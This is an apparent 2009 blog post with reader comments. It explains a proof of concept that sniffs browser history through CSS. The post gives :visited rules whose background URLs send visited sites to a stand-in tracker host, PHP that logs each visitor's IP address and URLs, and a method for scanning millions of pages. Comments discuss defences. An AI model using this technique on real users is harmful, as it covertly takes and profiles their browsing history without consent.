Sniffing Browser History with CSS

Have a look at this page: http://making-the-web.com/misc/sites-you-visit/nojs/. It will fairly quickly and effectively generate a list of sites that you have visited.

This proof of concept demonstrates how basic logic in CSS (Cascading Style Sheets) can be used to query a browser to whether a visitor has visited another web page. More generally, it shows that even simple logic in technology has the possibility of being exploited. Although the data used in this example seems rather unimportant, when used to profile a user’s likes and dislikes, for example, it quickly turns from “data” to personal information.

The CSS Logic

Fundamentally, this PoC relies on pure CSS. Take, for example, the following CSS…

#link1 {
	color: blue;
}
#link1:visited {
	color: red;
}

…applied to this:

<a id="link1" href="http://google.com/">Visit Google!</a>

From the above, you can deduce that “Visit Google!” will show up blue, by default; the exception to this is when the visitor has visited http://google.com/: the link will show up red. Seems innocent enough, right?

Consider, instead, this:

#link1 {
	color: blue;
}
#link1:visited {
	color: red;
	background: url(http://trackersite.ext/track.php?url=google.com);
}
<a id="link1" href="http://google.com/">Visit Google!</a>

As before, the link will show up blue by default. If the user has visited http://google.com/, it will show up red. However, it also displays a background image for the link. Obviously, to get the background image, the browser has to request it from the server — in doing this, it innocently sends additional information along with the request: ?url=google.com.

The Server Side Code

You have probably noticed that the background image doesn’t go to an actual image: .png, .gif, etc. Instead, it loads a PHP script. This script has the potential to log the sites a user has visited. Consider the following PHP:

<?php
/* ... */
$ip = $_SERVER["REMOTE_ADDR"]; // the user's IP address
$url = $_GET["url"]; // the URL they have visited
 
// log the information in the database table
mysql_query("INSERT INTO trackdb.log (ip, url) VALUES
	(\"" . mysql_real_escape_string($ip) . "\",
	\"" . mysql_real_escape_string($url) . "\")");
?>

Querying the browser…

Now that we know how to query the browser for one link, we can do it for many links:

#link1:visited {
	background: url(http://trackersite.ext/track.php?url=google.com);
}
#link2:visited {
	background: url(http://trackersite.ext/track.php?url=yahoo.com);
}
#link3:visited {
	background: url(http://trackersite.ext/track.php?url=amazon.com);
}
#link4:visited {
	background: url(http://trackersite.ext/track.php?url=php.net);
}
/* etc */
<a id="link1" href="http://google.com/">a</a>
<a id="link2" href="http://yahoo.com/">a</a>
<a id="link3" href="http://amazon.com/">a</a>
<a id="link4" href="http://php.net/">a</a>
<!-- etc -->

And it’s that easy! Just put thousands of links in, and you have the ability to find hundreds of pages that a user has visited.

How the PoC works

The PoC works as above, fundamentally. In order to check thousands of links, it uses publicly available data from Alexa and Yahoo! API.

Firstly, it scans for website homepages, as provided by Alexa. So http://google.com/, http://yahoo.com/, http://msn.com/, etc. It logs any visit to the server.

Secondly, it scans for individual site pages, such as http://google.com/cookies.html, http://google.com/adsense/, http://yahoo.com/uk/, etc. It will only scan a site’s pages if the site’s homepage was visited (ie, http://google.com/cookies.html will not be queried if http://google.com/ was not visited). To get the list of a site’s pages, it simply does a site:domain.ext query via the Yahoo! API.

Because it can detect 40 million pages, theoretically, it performs querying in “batch mode”: it might check 2,000 pages, and then use a META refresh to scan the next 2,000, and so on.

The PoC demonstrates this functionality using pure CSS and HTML. It could also use AJAX with Javascript to load lists, rather than using Iframes and refreshes.

The Implications

This exploit currently has the potential to be used in tracking website visitor’s likes and dislikes. This could then in turn be used to display advertisements targeted towards the user. For example, if you know a user has been visiting car-related web pages, you could display an advert for cars, which is likely to get a higher CTR (or click-through probability) than an advert for gardening equipment (unless they also visited sites related to this).

Naturally, many people will consider this information personal when used in this way, and are concerned about how the data is and could be used. Browsers and plugins are likely to reduce the effect of this exploit. (Firefox will be coming with an option to disable the :visited selector)

Related Posts with Thumbnails

Advertisements:

You can follow any responses to this entry through the RSS 2.0 feed.

Comments

  1. On July 10, 2009 Mike says:

    The question I have is what can be done to stop it ?

  2. On July 21, 2009 Dman says:

    How do you integrate Alexa data with the Yahoo API? It would be nice to see how you manage this.

  3. On July 22, 2009 Brendon says:

    The data isn’t “integrated”. The site asks Alexa for the 20,000 most popular websites, and then goes an asks Yahoo! for the 1,000 most popular pages on each of those websites. (up to 20,000,000 pages).

    Does that explain it?

    Thanks,
    Brendon.

  4. On July 29, 2009 Ricardo says:

    Genius! Evil but…

  5. [...] du site infinity-infinity.com à mis le doigt sur une faille CSS plutôt impressionnante. Nous allons voir ici la technique [...]

  6. On September 14, 2009 Teng says:

    Followed the link and all I see is an empty wordpress blog, has this been taken down already?

  7. On September 14, 2009 Brendon says:

    @Teng, I sold Making the Web a few weeks back, along with the rights to the demo. I expected the site to be put back up, but for some reason he has chosen to do nothing with it. Unfortunately, it is out of my hands and you will have to contact the new owner with enquiries.

    Thanks,
    Brendon.

  8. On October 11, 2009 Neddy says:

    Interesting idea! Would it be possible to make a javascript that loads ling via ajax and then generate the individual classes for each link?

  9. On October 11, 2009 Brendon says:

    @Neddy,

    Yes, it would be possible. In fact, the first version of the demonstration used Javascript (rather than use different classes, it just accessed the style attribute of the element to determine it’s colour, and hence whether it has been visited). I only changed it to I-frames because so many (naive) people complained that it didn’t work and NoScript protected them.

    -Brendon.

  10. On October 21, 2009 David says:

    Hello, Brendon.

    Thank you for your useful articles.

    For the benefit of anyone who is considering visiting the Making the Web WordPress Web log, the site (as of today, Wednesday, 21 October 2009) remains a blank template.

    On a related note, the Web site, What the Internet Knows about You, provides tools and information about history detection techniques and tips for mitigating risks . (Disclaimer: I have no affiliation with the site, which I just found today, nor can I attest to its accuracy or lack thereof.)

    The solutions page includes tips that will NOT protect you, including disabling JavaScript (and Brended makes it clear that the detection mechanism requires no scripting and uses CSS); using the Firefox NoScript plug-in (because cascading style sheets detect browsing history, but are not scripts);
    disabling Java or Flash (which are not involved in the techniques used for history detection; and, deleting cookies (which are not used in this CSS-driven browser history technique).

    The site offers three steps for protection from CSS-driven browser history detection: "In general, there are three possible ways of protecting your browsing history from being detected. While all of them have their own flaws, we present all the solutions we’re aware of to give you a choice of what to do. "

    The steps are to disabling your browser’s history (by setting your browser not to retain browsing history and installing certain Firefox extensions); disabling CSS styling of visited links (providing the ‘about:config’ solution for Firefox and a custom sytle sheet for other browsers, which should be tested); and, using a special browser extension to fix the problem (with suggested extensions and plug-ins for Firefox).

    Obviously, no panacea for this vulnerability exists and combining protective measures can cause conflicts, performance problems, and customizing CSS settings can cause your browser to render a given Web page in an unpleasant or useless manner.

    Cordially,

    David

  11. On October 22, 2009 Brendon says:

    @David, Thank you for your comment; to think it was almost lost to Akismet as spam…

    ‘What the Internet Knows about You’ is a good site which demonstates this exploit nicely. I second the suggestion to delete history if you do not want it detected.

    Thanks,
    Brendon.

  12. On November 13, 2009 Al says:

    is it possible for windows users to edit their HOST file?

    for the example above, adding a line like this in the HOST file

    127.0.0.1 trackersite.ext

  13. On November 22, 2009 Des attaques en CSS ! says:

    [...] la suite, la faille a été un peu élargie avec quelques bonnes idées apportés mi-2009. Notamment l’utilisation exclusive de CSS et l’utilisation [...]

  14. On February 12, 2010 Partyurlaub Zrce says:

    i there a solution to stop it, thus noone can do this on my system.

  15. On April 03, 2010 Mehmet ALP says:

    Great code! Thank you for sniffing browser document.

  16. On May 20, 2010 You are now listed on FAQPAL says:

    Sniffing Browser History with CSS…

    This proof of concept demonstrates how basic logic in CSS (Cascading Style Sheets) can be used to query a browser to whether a visitor has visited another web page. More generally, it shows that even simple logic in technology has the possibility of be…

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> <pre lang="" line="" escaped="">